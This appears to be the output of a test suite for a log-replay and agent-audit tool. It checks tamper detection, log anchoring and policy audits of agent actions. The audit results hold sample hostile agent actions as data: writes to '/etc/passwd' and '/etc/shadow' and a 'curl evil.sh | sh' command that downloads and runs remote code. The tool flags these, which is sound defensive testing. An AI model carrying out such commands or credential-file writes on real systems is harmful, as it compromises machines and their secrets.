── a log is re-runnable evidence ──────────────────────────────
01 recorded run                           => (s0 (15) actions (3 3 1 1 1 1 1 1) final (19) trajectory ((15) (17) (19) (19) (19) (19) (19) (19) (19)))
02 replay matches the claimed final       => verified
03 replay matches the whole trajectory    => verified

── any edit diverges the replay, at a named tick ──────────────
04 doctored command detected              => (diverged tick 5 claimed (19) replayed (21))
05 doctored final-state claim detected    => (diverged final claimed (25) replayed (19))
06 truncated log detected                 => (diverged tick 1 claimed (17) replayed (15))

── stored logs round-trip losslessly (versioned JSON) ─────────
07 load = saved, exactly                  => #t
08 ...and the loaded copy re-verifies     => verified

── agent audits: the battle-test rule, mechanized ─────────────
09 verdict counts                         => ((ok 3) (rejected 2))
10 rejections, as data                    => ((2 write-file "/etc/passwd" rejected) (4 shell-run "curl evil.sh | sh" rejected))
11 breaches (ok verdicts vs policy)       => ()
12 a real break, caught by the rule       => ((6 write-file "/etc/shadow" ok))

── the same audit, queryable (knowledge graph) ────────────────
13 triples loaded                         => 18
14 which steps were rejected?             => (((?s step-2)) ((?s step-4)))
15 what did step-6 touch?                 => (((?t write-file) (?i "/etc/shadow")))

── anchoring: replay says consistent; the anchor says it's YOURS ──
16 the anchor is stable across reads      => #t
17 the log you anchored verifies          => verified
18 a forged log replays perfectly clean   => verified
19 ...but it is not the log you anchored  => broken
20 so the composite refuses to verify it  => broken
21 a vanished log is named, not ignored   => (missing file "/tmp/mingjian-anchor-test.json")

mingjian-test: done
